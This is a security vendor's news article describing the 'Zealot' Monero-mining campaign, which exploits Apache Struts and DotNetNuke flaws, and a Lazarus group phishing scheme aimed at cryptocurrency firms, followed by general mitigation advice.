“Zealot” Campaign and the Lazarus Group End the Year With Cryptocurrency Mining Attacks

With cryptocurrency prices hitting new highs recently, it’s no surprise that cybercriminals are starting to become more aggressive in terms of profiting from these digital currencies. In the past few days, a couple of cryptocurrency-based security incidents occurred, with one aiming to install a  Monero miner on target servers, and the other using phishing tactics to victimize financial organizations.

The first of these incidents, known as the “Zealot” campaign after the use of the zealot.zip name used in one of the files dropped on the target system, involves the use of two vulnerabilities: CVE-2017-5638 and CVE-2017-9822. CVE-2017-5638 is an Apache Struts vulnerability that is notable for being the same one used in the Equifax breach back in September. CVE-2017-9822, on the other hand, involves DotNetNuke, one of the most popular web content management systems used today. In addition to the exploitation of vulnerabilities, this campaign also highlights the use of server platforms such as Struts as viable exploitation platforms.

In addition to the two vulnerabilities, for infected Windows machines, the campaign also leverages EternalBlue and EternalSynergy, part of a series of exploits released by the Shadow Brokers group earlier this year, for lateral movement within networks. Finally, the attackers will use PowerShell to download and install a Monero miner. So far, the campaign has reportedly generated around $8,500 worth of Monero coins.

The second incident involves the Lazarus group, which was linked to the Bangladeshi bank heists in 2016. In this case, the group uses a classic Business Email Compromise (BEC) scheme to attempt to steal bitcoin. They send emails purporting to be a job advertisement for a CFO position with a European cryptocurrency company to officials of cryptocurrency financial organizations. The infection is done through the email, which has an attached Microsoft Word file that installs a malicious macro once executed. This will load a Trojan that steals credentials in addition to downloading more malware.

These two incidents are a study of contrasts: the Zealot campaign is fairly sophisticated with the use of multiple vulnerabilities and exploits, while Lazarus uses a tried-and-true social engineering technique that is no less effective. Although these attacks are not connected with each other, they share a common feature: the element of cryptocurrency. Cryptocurrencies are different from traditional currency (aside from the obvious physical-virtual differences) in the way they are generated — mainly through mining, which involves heavy computational power from “miners.” Cryptocurrency mining malware makes use of large numbers of miners to create a botnet that will mine cryptocurrencies. Perhaps the most noticeable impact for the victims will be increased resource use and wear-and-tear of their machines. What makes cryptocurrency miners particularly sinister is that they can go virtually unnoticed, as a slower system is often attributed to non-malicious causes.

Fortunately, the impact of cryptocurrency mining malware can be minimized through the use of  best practices, most of which are part of standard security practices:

  • Malware that exploit vulnerabilities can be mitigated by regular updating and patching of systems.
  • Using strong device credentials can prevent unauthorized access from malicious elements.
  • Enabling firewalls and deploying intrusion detection and prevention systems can stop incursion attempts.
  • Knowing the tell-tale signs of common social engineering techniques such as unsolicited emails, suspicious attachments, and dubious websites can help both users and organizations recognize attacks before they affect the system.
  • For cryptocurrency miner-specific signs, users should watch for performance hits such as a sluggish system, excessive noise and heat, or slowdown of applications.

At the endpoint level, Trend Micro™ Smart Protection Suites deliver several capabilities like high-fidelity machine learning, web reputation services, behavior monitoring and application control, and vulnerability shielding that minimize the impact of this threat. 


Like it? Add this infographic to your site:
1. Click on the box below.   2. Press Ctrl+A to select all.   3. Press Ctrl+C to copy.   4. Paste the code into your page (Ctrl+V).

Image will appear the same size as you see above.